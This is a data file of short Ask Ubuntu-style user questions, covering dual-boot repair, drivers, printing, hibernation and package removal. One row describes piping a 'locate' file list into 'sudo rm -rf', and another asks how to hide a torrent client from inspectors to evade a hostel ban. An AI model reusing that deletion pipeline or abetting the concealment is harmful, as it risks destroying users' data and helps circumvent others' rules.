110828	how can i use dead keys for consonants ?	first , my disclaimer : i 've used windows my whole life , and i 'm trying ubuntu for the first time ( third day today ) , so i 'm totally a newbie . now , my problem : i write in spanish a lot , so i use dead keys to accentuate characters , like this : áéíóú in windows , i could use the us - international keyboard layout to achieve it , and it was nice for writing in english too for the contractions like do n't , i 'm , etc the difference is that in ubuntu , i have to press the spacebar for it to work , so to write i 'm i have to type i , press ' , press the spacebar , and then type m in windows , the spacebar was not necessary , but if i do n't press it in ubuntu i get iḿ is there another layout that achieves this windows-like behaviour ? i 'm using english ( us , international with dead keys )
110830	windows 7 blue screen then restart after loading from grub	i have ubuntu dual booting windows 7 and after repairing grub and a few windows updates , now windows 7 just goes to blue screen upon loading from grub then restarts . is there any way to fix this ? i 'm using ubuntu 12.04 32bit . edit : for something i ca n't get them to cooperate with each other . i 've reinstalled grub so many times it hurts , and every time i do , i ca n't run win 7 from the grub loader - it loads to logo then restarts.. and when i run bootrec.exe /fixmbr , bootrec.exe /fixboot and bootrec.exe /rebuildbcd i can load windows but then grub goes away ...
110835	how to disable the internal sound card ?	i have an internal soundcard and an external usb soundcard that i use because the headphone jack in my laptop is broken . i need to be able to disable the internal card so sound will go through the usb card . this was acheivable through system settings > sound in 11.10 . i tried clicking on the internal sound card in the list , and muting it , then going to the usb sound card 's digital output ( s/pdif ) and found that it was muted as well , so i unmuted it . then , i hit test sound , but the sound came through internal speakers again . i checked the internal card , and it was unmuted again . i repeated the same process with the analog output of the usb card as well . same thing happened . i have not tried this yet , but i believe when i plug in my logitech webcam , i will need to disable the built-in laptop microphone , the laptop mic jack , and the usb mic jack , for the microphone in the webcam to work as well . the input side is suffering the same problem as output about muting all devices instead of just one . maybe i 'm missing something on the dialog . i just need to know how to selectively enable/disable sound devices through the options dialog . i 'm sorry if i put this in the wrong place , probably need to file bug report .
110837	how to automatically hide error messages in gnome shell 's notifications ?	i 'm using ubuntu 11.10 and gnome-shell 3 . i`m using guard to notify test pass or failure . how to automatically hide error messages from libnotify in gnome shell ? when i have green test notification hide automatically after few seconds but when my test have errors i have to click on error messages to hide because they are overlay all other notifications . how to setup autohide for errors ? ?
110841	how to reset zoneminder password ?	is there a way to reset the admin password for the surveillance application zoneminder without re-installing the application ? i was not able to find this information in the documentation or by googling it .
110843	installing ubuntu on mac using bootcamp	am currently running ubuntu 11.10 on mac using parallels . its only 2 days that am using ubuntu , am quite impresses with the os features . am now planning to install the os using bootcamp in mac . i would like to know more about the following is it possible to install ubuntu on mac using bootcamp . if yes ( # 1 ) , can i install using the iso file or do i need setup cd for the same . whats the ideal configuration required to install ubuntu 11.10 ( hdd space , memory ) after installation , how do i connect to internet . any assistance is highly appreciated .
110852	can i install a 32-bit java in addition to a 64-bit version ?	for normal development i 'm using the 64-bit vm which comes when i install the java development kit ( openjdk ) with the package manager . but there are some java applications ( containing native libraries , i suppose ) which do n't work on a 64 bit java vm . ( looks like soapui is such a candidate - in version 4.0.1 and 4.5 beta 1 , it fails with a segmentation fault if run in a 64 bit vm . ) i tried to install the i386-version of openjdk-6-jre in addition to the 64-bit one , but this is refused by aptitude ( saying that it conflicts with the existing 64-bit version ) . the same happens if i try to install openjdk-jre-7 in the 32-bit version . an answer to can i run a java 32-bit application on a 64bit system proposed to install ia32-sun-java6-bin , but there is no package with this name ( or anything with ia32 and java ) . what could i do here to run soapui without switching my whole system java installation to 32 bit ?
110855	how do i migrate shotwell tags to clean installation ?	i have shotwell installed in 11.10 . when 12.04 comes out i will do a clean install as usual but i would like to not have to redo all those tags . is that possible and if so how ?
110860	lines disappearing intermittently from both terminal and emacs	i 'm having trouble even finding the right search terms to diagnose this problem . it 's also hard to reproduce on my own machine . when i enter a command in the terminal , occassionally i will see no results at all . i wo n't even see a new prompt . it seems like the display is getting corrupted . all it takes to clear it up is hitting enter again . then i will see a ( second ) new prompt , and the result of the previous command . a similar thing is happening in emacs . when i switch to a buffer , or scroll , occassionally there are several missing lines , or even portions of lines . if i highlight those lines , they become visable again . i 'm not even sure what system controls rendering in both emacs and terminal . i do n't notice the problem in any other applications ( other than those , i mainly use chrome ) .
110865	compiz shifter not present	hey guys i am using ubuntu 11.10 and i have been using ubuntu for about 6 months now , i saw in a few videos about ubuntu and found out about some type of cube and it happened to be compiz shifter which made that cube thing . i have been searching for a loooooooong time and never found out how to install compiz shifter . please guys teach me how to install compiz shifter in my ubuntu . ( i dont have a graphic card ) if i cant install it without a graphic card , shouldnt i be able to install it in another way ? ? oh come on ! ! i would love to have that in my ubuntu . ( if i need to do some changes tell me cause i am a c++ programmer and i might be able to edit a few things )
110867	dependecy problem when trying to remove emacs	hello i 'm trying to remove emacs - but when i select it for deletion in synaptic - xemacs got selected for an installation . how do i remove emacs and xemacs from my system ? i want to do it , because i use a building age git cloned emacs - and it badly interfere with a system-wide installed . edit : i 've restarted a computer , unchecked xemacs , unintalled some emacs , than uninstalled all of system-wide emacs . edit 2 : after i 've removed emacs with synaptic , there still were some packages left . i found them by : updatedb # updates locate 's database and then have loged the output of locate emacs > log after cleaning some redundund entries i did : cat log | parallel sudo rm -rf # you must have parallel installed
110870	will ubuntu 12.04 kernel address the aspm issue	i am asking as https : //wiki.ubuntu.com/precisepangolin/technicaloverview/beta1 # ubuntu_kernel mentions , they will enable rc6 , which is not the same as fixing the aspm issue . http : //www.phoronix.com/scan.php ? page=news_item & px=mtaymjk
110871	can i install a beta/alpha/development version using wubi ?	how do you install the next version of ubuntu ( ubuntu+1 ) using wubi ? when clicking the download button for the latest beta , will wubi show up as an option ?
110878	sometimes invisible pidgin	i have msn , xmpp , sipe ( with plugin ) and skype ( with plugin ) in my pidgin configured . if i open pidgin through unity launcher , unity menu or with autostart sometimes the pidgin main contact window is hidden . if someone writes a message , the message window appears . only by killing the task with `` kill -9 ** '' helps and brings the window back to desktop by restart of pidgin . only closing pidgin and starting pidgin again does n't work . thanks for helping .
110882	compiz changes my window 's theme	i have gnome shell , unity and xubuntu on my computer and i would like to use compiz in xubuntu . whenever i put in `` compiz -- replace '' it changes my window 's theme from greybird to gnome 's ambiance . it does n't seem like i can change it back in xubuntu 's settings menu , when i click on window manager , everything is blank . any suggestions ?
110889	need to use sudo -s for make command depending on ubuntu version	we have a makefile for compiling a network interface 's driver . when calling the makefile in an ubuntu 9.04 installation , we need to call just 'make ' . however , when calling the makefile in an ubuntu 10.04 installation , we need to call 'sudo -s make ' . in ubuntu 9.04 , if we call 'sudo -s make ' , the compilation fails . and in ubuntu 10.04 , if we call 'make ' the compilation also fails . although the compilation can be carried out in both versions of ubuntu by either issuing or not issuing the 'sudo -s ' bit , we would like to have a single .sh script that calls the makefile successfully regardless of which version of ubuntu it is running on . are there any differences in the way that sudo -s is treated in 9.04 compared to 10.04 ? and if there are , what is the best solution for ensuring that both versions are catered for in one single .sh script when calling make ?
110892	print via terminal without usblp	i need to print in an epson tm-u220pd model m188d for receipts ( without cups support ) , i used to write in a terminal [ text ] > /dev/lp0 but now usblp is deprecated . i can use this printer enabling the usblp kernel module , but this action disable cups . there 's other way to print , maybe using cups ? how can i find the new path to the printer ?
110893	ca n't install any update or software from software center	i tried to install updates and it 's saying to get partial upgrade when trying partial upgrade does n't working again . and when trying to install any software it does n't installing . can someone help me ? edit the sudo apt-get update output is e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
110894	biblatex package recommends biber ( > = 0.9 ) , but it does n't exist	i 'm not sure i understand what this means . how can ubuntu recommend something that is n't in the repository ? am i supposed to fetch the source code and install myself ? why is n't there a biber package ? to be clear , i can use biblatex without biber , but it preferable to use them together . update : ok , i guess i 'll download the biber source . i 'd rather not install the whole texlive , because it 's cumbersome to say the least . by the way , biber is a terrible package name - when searching for it on google i keep getting it corrected to bieber , argh .
110895	how to get my custom .desktop file into the unity launcher ?	i 've created a .desktop file like this [ desktop entry ] categories=game ; name=mari0 exec=love-unstable /opt/mari0/mari0_1.0.love icon=/opt/mari0/icon.gif type=application and what i want is to get it in the unity launcher under the games category i first asked how to create a shortcut file and how to get it into the launcher , but now i 've created a .desktop file myself . and i 'm looking for how to get it into the launcher
110898	how do i change a machine name in dns	i 'm trying to change my computer 's name in dns so that others on the same subnet can refer to it by its new name - however , whatever changes i make in /etc/hosts and by using 'hostname ' to use the new_host_name and shutting-down and starting , dns still gives me the old host name . i 'm running ubuntu 11.10 on ... c all my colleagues/partners are on the same 172.xx.30.xxx subnet q1 . how do i make the change permanent in dns ? q2 . will this ensure that other computers can see my computer with the new *new_host_name* ? thanks in advance for any guidance and answers , best , shailen
110899	configuring transmission for faster download	i have tested on the same pc with the same torrent/magnet links the following torrent clients : transmission ktorrent deluge qbittorrent vuze after 7 days of testing i noticed that the only one that took longer to start downloading and to keep an optimum/max download speed was transmission . it was the slowest of them all to download the same torrents or magnet links which i tested 8 torrents and 4 magnet links from different sites and the one that took the most to start downloading or start after a pause/resume event . the other 4 just took less than 2 seconds for example to start downloading and to download the same content between 50 % less time to 80 % less time . i think that transmission has the same capabilities about downloading/resuming than the other torrent clients but it may be because of some configuration i need to do to get the same speed and effect than the others . in my tests all torrent clients were tested with their default configurations . no changes were made . they were tested on the same pc , with the same network connection in the same time periods . so i am thinking that transmission just needs a little bit of configuration tunning . i also set the ports for use to the same one for each . checked the router for any blocking and anything related to the network . what options can i change to make it so transmission resumes a download faster ( grabs the seeds faster ) and keeps a fast download all the time ( stays with the seeds that offer the best connection for example ) . both of which by the look of it are features that the rest of the torrent clients do already .
110900	will ubuntu one sync if i update files in my local directory ?	if i change a file in my local ubuntu one directory : will it be sync to the cloud server ? will this file be updated on another pc 's ubuntu one directory ? thanks
110901	use xinput to adjust scroll direction when logged in through nx-server/player	i followed these instructions to configure natural scrolling for my normal ubuntu ( 11.04 ) desktop , and they worked just fine : http : //maketecheasier.com/reverse-mouse-scrolling-direction-in-ubuntu/2011/09/16 but those settings , even when i 'm logged in as the same user through nxserver remotely do n't apply . so i tried to adjust the scroll direction manually using xinput like so : xinput list '' pointer '' id=0 [ xpointer ] '' keyboard '' id=1 [ xkeyboard ] and then : xinput get-button-map 0 x error of failed request : xi_baddevice ( invalid device parameter ) major opcode of failed request : 131 ( xinputextension ) minor opcode of failed request : 3 ( x_opendevice ) device id in failed request : 0x0 serial number of failed request : 15 current serial number in output stream : 15 to see the current button map , trying to change the mapping with : xinput set-button-map `` pointer '' 1 2 3 5 4 6 7 8 9 10 11 12 13 14 15 16 x error of failed request : xi_baddevice ( invalid device parameter ) major opcode of failed request : 131 ( xinputextension ) minor opcode of failed request : 3 ( x_opendevice ) device id in failed request : 0x0 serial number of failed request : 15 current serial number in output stream : 15 results in the same error . anyone know how to do this ?
110907	python compared to bash	i 've been studying bash for the past three weeks or so , and it is very easy to learn since it is basically just command line inputs . i 've decided to now move onto python but i 've been lost the whole time trying to learn it . my question is in python , it all seems to revolve around numbers , lists , variables , etc . while bash seems to be much more straight forward with the commands . i can not find one example in python where there is a way to move files , change directories or other things like that . i feel like i 'm already too used to bash to learn python . can someone please explain any of this to me .
110909	type greek and other physics symbols in libreoffice impress ?	i am preparing a presentation on some physics concept for which i need to write 'phi ' , 'phi dagger ' , and hamiltoninan symbol , is there anyway to do it on libreoffice impress or should i ask my friend to lend his windows for a day or two ? , thanks
110911	how can i run update-grub on a chroot filesystem	i 've been building a live ubuntu server ( 10.04 lts ) to run off a thumb drive and it 's nearly there . however , i 've gotten stuck at one step . i need to run update-grub but it 's complaining about : /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . my fstab file contains : # filesystem mount point type options dump pass uuid=76d2077e-9726-4f95-abab-323cb426b099 / ext2 defaults 0 0 proc /proc proc nodev , noexec , nosuid 0 0 sys /sys sysfs defaults 0 0
110913	which software ( s ) can serve as mathematica and matlab equivalents ?	i 'd like to know the equivalents of mathematica and matlab on ubuntu , since both are costly .
110914	can i create virtual memory ?	on windows you can use virtual memory to use disk space as ram . can you do this on ubuntu ?
110917	skype causes ubuntu to freeze	i got two pcs ( one a little bit older desktop and a new hp probook 5330m lg719 laptop ) , both running ubuntu 11.10 . when i log in on either of them , sooner ( sometimes right after login ) or later ( sometimes 30 minutes afterwards ) the whole desktop gets extremely slow . that is , i can no longer use it , the mouse will only move every other second for some pixels , or not at all ; keyboard input does not seem to work ( at least alt+f4 , etc . ) i can not think of anything that might cause it : my laptop runs on an intel core 5 , my desktop an amd phenom 9650 . the former got an intel hd 3000 graphics processor ( rc6 and stuff enabled , which never caused crashes without skype enabled ) , the latter a nvidia geforce 8400 gs with proprietary drivers . the only other software i have installed that is not in the standard installation is , as far as i remember , dropbox and google chrome . neither in syslog nor in the xorg log are any entries near the time of the freeze . starting skype in the terminal wont give any results , it seems to crash before reporting . does anyone experienced similar problems or know a solution for it ?
110920	can not resume from hibernate ( s2disk )	i seem to be able to hibernate ok using s2disk , but when i switch the laptop back on , it seems to hang half-way through the `` resuming '' menu . the splash screen looks healthy , it seems to be trying to resume from the correct disk , but it hangs about half-way through , with three little pips . one great help would be - where can i find the logs , and how do i get more verbose ones ? there is some info in /var/log/pm-suspend.log , but that all seems fine , just lots of hibernate : success messages ... how do i switch on more verbose logging in s2disk ? and what about the resume process , where are the logs for that , and how can i make them more detailed ? background : the standard ubuntu hibernate would n't work , so i 've install uswusp and its associated tools - s2disk etc . that initially made things worse , but a fair amount of fiddling with its config , my swap size and so on seem to have got it at least seemingly successfully suspending ... [ update ] some config info : ram : 8gb swap space : 8.63gib ( nb i did try increasing swap to 16gb , did n't help ) $ sudo blkid /dev/sda : type= '' isw_raid_member '' /dev/zram0 : uuid= '' 45e58d74-be57-4ad4-95de-217e9ba7d087 '' type= '' swap '' /dev/sdb : type= '' isw_raid_member '' /dev/mapper/isw_dgibfidibf_volume0p1 : label= '' ubuntu '' uuid= '' 7ca86fcb-a969-45d5-b67f-fe29bc568f4d '' type= '' ext4 '' /dev/mapper/isw_dgibfidibf_volume0p2 : label= '' system reserved '' uuid= '' 2a1a38861a3850d5 '' type= '' ntfs '' /dev/mapper/isw_dgibfidibf_volume0p3 : label= '' windows '' uuid= '' fe6c39286c38dd59 '' type= '' ntfs '' /dev/mapper/isw_dgibfidibf_volume0p5 : uuid= '' dfb8af38-acf1-42be-be18-131d326a21ff '' type= '' swap '' /dev/mapper/isw_dgibfidibf_volume0p6 : label= '' shared '' uuid= '' 10ba-fe58 '' type= '' vfat '' $ cat /etc/initramfs-tools/conf.d/resume resume=/dev/mapper/isw_dgibfidibf_volume0p5 [ update 2 ] - have followed instructions at https : //wiki.ubuntu.com/debuggingkernelsuspendhibernateresume and submitted a bug report : https : //bugs.launchpad.net/ubuntu/+source/hibernate/+bug/987109
110922	climb up the directory tree faster	if i 'm in a very deep directory a/b/c/d/e/f/g/h/i/j and want to come back a/b/c , i have to use ../../../../../../../ . is there command i can pass through a number , e.g . cd up 7 , to speed this operation up ?
110931	problems with maintaining a network connection using a zte datacard provided by neotel	i have a neotel datacard/modem that uses cdma , when first plugged in it works fine but abruptly disconnects and wo n't connect until i restart the computer im not certain on the model name and a link can be found here http : //connection.neotel.co.za/datacard does anyone have an idea what the solution may be ?
110934	hide bittorrent from installed applications in dash ?	i use a shared internet connection in hostel where there is a ban on using torrents ( since it sucks speed ) , but still im sometimes desperate to use it , so , is there any way to hide torrents from installed applications menu in dash ( in case some random guy comes inspecting ) ?
110937	twice the amount of drives show up when setting up a raid array	i am trying to set up an array , with ubuntu . i have hooked up an array containing 12 drives of 1tb , but when i run the following command , it returns 24 - 1tb drives . what 's causing this , and where do i start ? sudo lshw -c disk -short h/w path device class description ========================================================== /0/100/7/0/0.0.0 /dev/sdb disk 1tb scsi disk /0/100/7/0/0.1.0 /dev/sdc disk 1tb scsi disk /0/100/7/0/0.2.0 /dev/sdd disk 1tb scsi disk /0/100/7/0/0.3.0 /dev/sde disk 1tb scsi disk /0/100/7/0/0.4.0 /dev/sdf disk 1tb scsi disk /0/100/7/0/0.5.0 /dev/sdg disk 1tb scsi disk /0/100/7/0/0.6.0 /dev/sdh disk 1tb scsi disk /0/100/7/0/0.7.0 /dev/sdi disk 1tb scsi disk /0/100/7/0/0.8.0 /dev/sdj disk 1tb scsi disk /0/100/7/0/0.9.0 /dev/sdk disk 1tb scsi disk /0/100/7/0/0.a.0 /dev/sdl disk 1tb scsi disk /0/100/7/0/0.b.0 /dev/sdm disk 1tb scsi disk /0/100/7/0/0.d.0 /dev/sdn disk 1tb scsi disk /0/100/7/0/0.e.0 /dev/sdo disk 1tb scsi disk /0/100/7/0/0.f.0 /dev/sdp disk 1tb scsi disk /0/100/7/0/0.10.0 /dev/sdq disk 1tb scsi disk /0/100/7/0/0.11.0 /dev/sdr disk 1tb scsi disk /0/100/7/0/0.12.0 /dev/sds disk 1tb scsi disk /0/100/7/0/0.13.0 /dev/sdt disk 1tb scsi disk /0/100/7/0/0.14.0 /dev/sdu disk 1tb scsi disk /0/100/7/0/0.15.0 /dev/sdv disk 1tb scsi disk /0/100/7/0/0.16.0 /dev/sdw disk 1tb scsi disk /0/100/7/0/0.17.0 /dev/sdx disk 1tb scsi disk /0/100/7/0/0.18.0 /dev/sdy disk 1tb scsi disk /0/100/1f.1/0.0.0 /dev/cdrom disk dvd reader /0/100/1f.2/0.0.0 /dev/sda disk 320gb hitachi hdt72503 /0/1/0.0.0 /dev/cdrom1 disk scsi cd-rom
110943	able to connect adhoc wifi network , but terminal says no wlan0	i have a wifi and a ethernet card on my laptop . i 've created an adhoc network and using internet via lan . i am able to connect my adhoc network , but , when i do ifconfig , it does not display any wifi interface . ifconfig -s iface mtu met rx-ok rx-err rx-drp rx-ovr tx-ok tx-err tx-drp tx-ovr flg eth0 1500 0 13115 0 0 0 8157 0 0 0 bmru eth1 1500 0 0 0 0 0 10 19 0 0 bru lo 16436 0 475 0 0 0 475 0 0 0 lru virbr0 1500 0 0 0 0 0 24 0 0 0 bmru i want to be able to start/stop my wireless interface from terminal , but ca n't sudo ifup wlan0
110946	problem with adobe-reader	i can not open the preferences dialog in adobe-reader . i want to uninstall it and get rid of all the configurations . how can i do that ? i installed from the binary that was provided in adobe 's website . i looked for uninstall file , but i could not find it . i also tried apt-get remove adobe-reader , but that did not help either .
110948	if i have a live usb with persistence , if i install it , will the persistence be included	let 's say i want to take a live usb with persistence , boot into it , get it all setup then install it . will all my features still be there ? if not , is there a way to do this ?
110949	atheros ar5008 not working properly	on ubuntu 10.04 server 32bit it worked on 20dbm/100mw , but on 11.10 it just can use 17dbm/50mw . why ? how can i use this wireless card on 11.10 as i used it on 10.04 ?
110952	how do i get a usb thumb drive to boot with grub2 ?	i have grub2 installed on a usb flash drive . along with a minimal installation of ubuntu server 10.04 lts . this was created using the debootstrap utility . however , now i 'm trying to make it boot and having trouble getting it to do so . the thumb drive has a single ext2 primary partition on it and i 've copied the bootloader onto it along with the kernel and kernel modules that i need and the grub.d scripts . i thought since this is a thumb drive i should probably use uuid 's instead of device names . anyway , when it tries to boot grub2 is throwing it back to the rescue prompt with this error . error : no such device : 792f ... ... aaee3 so i ran the ls command like so : grub rescue > ls ( hd0 ) ( hd0 , msdos1 ) that 's confusing . is grub2 assuming the first partition is msdos and not ext2 ? could that be why it 's not starting ? i recall seeing somewhere that some bios 's treat thumb drives as floppy drives and make the first partition msdos ? is that what 's going on here ? edit : interestingly , ubuntu 's make startup disk produced exactly the same error . however , i 'm not 100 % on this because when i ran it , it failed to install the bootloader . so i installed it manually with the command `` grub-install /dev/sdb '' update1 : i discovered that because i created the grub.cfg on another system that it had hd1 in all the entries . so i changed it to hd0 . now i noticed that i can run these commands at the rescue prompt . ls ( hda,1 ) / i decided to try insmod normal normal and sure enough it came up with the menu and i was able to select a menu item and boot linux . now , how do i fix the `` no such device '' error . the uuid of /dev/sda1 is definately what it is . update2 : ok this is really weird . i pulled the flash drive out and plugged it back into my other computer . blkid is saying the following : /dev/sdb1 : label= '' transcend '' uuid= '' 597d-50b2 '' type= '' vfat '' /dev/sda5 : uuid= '' 0c81f24b-edeb-4be9-9859-074f3783e618 '' type= '' swap '' firstly , /dev/sda1 is not showing up . could that be something to do with it being on lvm ? secondly , the uuid for sdb1 my trancend thumb drive is short ? and it 's different to what it was earlier . how did that happen ? are uuid 's generated once when the filesystem is created or are they re-generated sometimes by some utilities that i may have run ? update3 : the uuid changed back to normal once i unmounted the drive and remounted it . maybe that 's a bug in kubuntu 11.10 ( my desktop machine ) .
110953	can i specify particular lts release in /etc/update-manager/release-upgrades ?	i have an hp dl360 g4 server . i currently run 10.04 lts server on it . however , to install 10.04 , i had to first install 8.04 lts and then use `` do-release-upgrade '' to upgrade to 10.04 , as the g4 will not boot the 10.04 cd image . i set `` prompt '' in /etc/update-manager/release-upgrades to `` lts '' , which looks for the next lts . i 'm planning on getting another dl360 g4 , but it may not be till after 12.04 lts comes out . is there a way to specify 10.04 lts in /etc/update-manager/release-upgrades instead of having it install 12.04 ? i need to run 10.04 on both machines . i realize that the dl360 g4 is not ubuntu certified , but it is all that my budget allows .
110958	how do i examine the files in my account	i have a single directory/folder on ubuntu one . how do i examine its contents to see what is there ( ie what has been uploaded ) ? multi-clicking does n't appear to work . ( running ubuntu 11.10 ) .
110965	installation problem error : kernel_thread_helper	good afternoon forumer of this great ubuntu community , i pose my problem to see if i can help find a solution. ! my computer a p4 ht 1gb of ram 160dd my chipset is intel start with the live usb and will not let me install or run the usb system from the start of due process but ends up an error : kernel_thread_helper +0 x6/0x10 achieve install the system with f1 then f6 and write to the boot : `` live-install acpi = off and give me step and the installation wizard ! normally installed and make dual boot win7 with my other os when trying to start ubuntu 3.0.0 charge q ubuntu linux ... . so generic happens to a black screen and console or two and just get a blinking courses and more i have nothing i can be understood to be the same so i did not install at the beginning dajaba ? in recovery mode i can not access will know how i can solve the problem since i can not get into ubuntu in any way or by the installation or by the live usb ! the ubuntu installed is 11.10 i appreciate your answers !
110966	how to install an .air file ?	i have downloaded conqu from here and the downloaded file is .air i do n't know what this extension is and is it executable or not , so how to install it on ubuntu 11.10 ? ? ?
110968	are there plans for adobe to support ubuntu ?	i 'm a web developer and also ubuntu user for some time . ubuntu is my favorite and only one distribution i use . i work with debian also but debian is the best for server and ubuntu for desktop and laptop . sad thing for me that i still need to use windows just only because there is no chance to install adobe cs5.5 package on ubuntu . i tried with wine but i was n't successful . also adobe customer service informed me that installing adobe package on linux is illegal . is there are any plans for changes ? is there are any chances for compatibility in near future ?
110969	notify-send ignores timeout ?	maybe i 'm doing something wrong , but should n't the commands ( run separately ) notify-send -t 1 `` test '' notify-send -t 1000 `` test '' notify-send -t 10000 `` test '' have different timeouts ? the first being nearly instantaneous , the second one taking 1 sec and the third 100 seconds . in all cases it seems to take about six seconds . i 'm using the development branch of precise , if this is n't an issue in the released version i 'll close this as being too localized , but i 'm unable to test it now .
110975	i can not install printer canon ic d860	[ translated post ] i 'm new and i 'm installing a printer where i work to change the os 8 computers before with `` win xp '' take and operating a lexmark e120 i was not previously tested drivers , and now i have faults with the multifunctional canon imageclass d860 in the list when i add it in samba shows any driver for that printer , if anyone knows if it works with another miracle or there is a universal one : p hehe it thank you very much for your help now ! ps the printer is shared on the network and the server machine has win xp os thank you . [ original post ] soy novato y ando instalando una impresora en donde trabajo cambie los so 8 computadoras antes con `` win xp '' ya heche a funcionar una lexmark e120 que anteriormente no me daba probando controladores , y ahora tengo fallas con el multifuncional canon imageclass d860 , en el listado a la hora de agregarlo en samba no me aparece algun controlador para esa impresora , si alguien sabe si funciona con otro o de milagro hay uno universal : p jeje pues muchas gracias por la ayuda desde ahora ! pd la impresora esta compartida en red y la mรกquina con el servidor tiene so win xp gracias .
110978	can not boot up suddenly , possible problem with hardware clock ?	i dual-boot windows 7 and ubuntu 11.10 on my new asus k53e laptop , and have been doing so happily for a couple of weeks now . today i was playing a game in windows 7 , then closed the game and restarted my computer . i should mention that it was plugged into ( and exclusively using ) an external monitor at the time . again , i have been doing this without problems for days . when the computer rebooted and the grub 2 menu came up , i selected my ubuntu partition and it began loading . then suddenly , the screen started to flicker between a black screen with the mouse cursor and a black screen with lots of white text , but it flashes too fast for me to read . i have disconnected the external monitor ( and indeed everything but the power cord and ethernet line ) and attempted to reboot but the same thing happens . when i boot into ubuntu recovery mode and run fsck from the graphic menu , here is the output : fsck from util-linux 2.19.1 [ 130.370228 adding 3964924k swap on /dev/sda6 . priority : -1 extensions:1 across : 3964924k /dev/sda5 : superblock last mount time is in the future . ( by less than a day , probably due to the hardware clock being incorrectly set ) fixed . /dev/sda5 : ***** reboot linux ***** /dev/sda5 : 274504/12124160 files ( 0.3 % non-contiguous ) , 4230068/48492032 blocks mountall : fsck / [ 477 ] terminated with status 3 mountall : system must be rebooted : / finished , please press enter i also tried the remount command to `` remount / read/write and mount all other file systems '' as listed in the menu and received the following information : fsck from util-linux 2.19.1 [ 130.370228 adding 3964924k swap on /dev/sda6 . priority : -1 extensions:1 across : 3964924k /dev/sda5 : superblock last mount time is in the future . ( by less than a day , probably due to the hardware clock being incorrectly set ) fixed . /dev/sda5 : clean , 274507/12124160 files , 4230363/48492032 blocks [ 22.401032 ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro finished , please press enter pressing enter takes me back to the recovery menu screen . i have run the dpkg command from here to repair any broken packages but it reports there are none . i used the grub command to update grub bootloader but that did n't do anything either . when i use the resume command to resume normal boot , lots of text flashes on the screen and i am able to catch a brief glimpse of something that reads like this : starting load of fallback graphics device [ fail ] that may not be worded verbatim , but the terms `` load '' `` fallback '' `` graphics '' and `` fail '' are definitely all there . all text is in white except for fail which is in red/orange . it should be noted that i can boot into windows 7 with no problems , and when booting from an ubuntu 11.10 live cd and mounting my ubuntu partition , i can not copy any of my files to an external drive because they are owned by `` group 1000 . '' how do i get my ubuntu partition working again ?
110980	intel centrino wireless n-1000 problems	[ translated post ] i am having problems in 11.10 with the centrino n1000 . if i am 5 meters away from the wireless router the signal lowers a lot . i have to be very close to it . i have googled for this . in windows it works correctly . is it possible to solve this problem ? [ original post ] sigo molestando por aca pues me he encontrado con otro problema creo si se puede resolver he visto mucho googlenado pero en mi caso particular no ha funcionado , tengo una tarjeta intel centrino n1000 si funciona , solo que su intensidad es muy baja si estoy a mas de 5 metros del router , es inestable se desconecta mucho no se que tanto pueda mejorar la tarjeta , con windows obviamente funciona sin problema , una pregunta si llegara a funcionar y estabilizarse 多puede ser mas potente ? he checado que muchos dispositivos de la computadora funcionan mucho mejor , muchas gracias , ciao . pd descargue compat-wireless intente seguir muchas instrucciones que lei pero no podia seguir con los pasos que algunos marcan en distintos posts .
110982	how to create a timed shutdown , based on idle state ?	in ubuntu 11.10 , when i go to system settings > power , i get the option to suspend my machine after it 's been idle for a set period . how can i set the machine to shut down instead ? to be clear , i am not interested in setting the machine to simply shutdown after a specific amount of time or at a specified time , as is possible with the shutdown command in terminal . i am interested in my machine automically shuting down and powering off a set period of time after i last did anything .
110984	sharing files with android devices ( how do i mount an hp touchpad , cyanogen mod 9 ? )	i 've recently installed cyanogen mod 9 on my hp touchpad tablet , but i 'm encountering problems when trying to access it from my ubuntu laptop ( ubuntu 11.10 , gnome-shell , nautilus ) . i 've first tried accessing it via ptp as suggested here . ubuntu will recognize the touchpad as a digicam and only grant me access to two directories : `` dcim '' and `` pictures '' . i then tried accessing the tablet via mtp using this post on omgubuntu ! . ubuntu will connect to the tablet , but only grant me access to a folder named `` playlists '' .
110988	how do i install packages without using a package manager ?	i would like to know how to install .deb packages without using a package manager such as dpkg . is it possible to do this ? what files do i have to edit ? or is there a unique procedure for each package ?
110993	is it possible to show the device id in nautilus properties ?	i use unetbootin to boot isos from usb devices , however when it asks me which device to install it to it lists them by device id ( ? ) ie sdb , sdc etc . the only way i know to find out which device is which is by going to disk manager . is a similar effect achievable from the properties page in nautilus ? it show me the mount point ( /media/drivename ) but this does not help me identify the drive by its device id .
110999	is it possible to switch ubuntu back to base-2 ?	beginning with ( lucid ) 10.10 , ubuntu began using base-10 to represent storage sizes . for me , working with windows all day and then going to work on my ubuntu notebook , it is very irritating to have to calculate values sometimes . i understand that it is the recommended policy to use base-10 ( gb ) , but i am all too familiar with base-2 ( gib , or gb on windows ) and i blame windows . so here is my question : is it possible to switch ubuntu 's units policy to base-2 and if so , how ?
111002	ubuntu wo n't load with graphics card installed	i recently brought graphics card but ubuntu will not boot if i have graphics card in , as soon as i take it out starts fine . i get the boot choices menu , windows seems to start but get blinking cursor when i try ubuntu , i do n't get to the ubuntu loading logo and am not sure how to install drivers without it plugged in . the card is an : msi - n560gtx-ti if thats any help . nvidia chip .
111006	wubi install does not load	i 'm new to ubuntu and want to install it along side windows , so i can get the hang of it . i installed it using wubi , i then chose to run ubuntu from the boot menu it does then i get 2 options : generic and recovery . if choose the generic version but it does n't load up at all . just wondering what i did wrong or whats happening . i left my pc running for an hour with the purple screen to see if it was just setting up , nothing happens . also i am getting error readings when trying to create a disc , with `` nero burn '' and `` windows-disc-burner '' . i am trying to install 11.10 64-bit , my pc is a 64 bit one , does it matter or do i have to install a 64bit version , this is the error code i get after i try boot from one of the cd 's i have burned and after the ubuntu logo appears enter help for list of build in commands ( initramfs ) mounts : /mounting/dev/loop0 on // filesystem . squashfs failed : input/output error can not mount /dev/loop0/ on/cdrom/casrper/filesystem.squashfson//` filesystem . squashfs any suggestions would be appreciated .
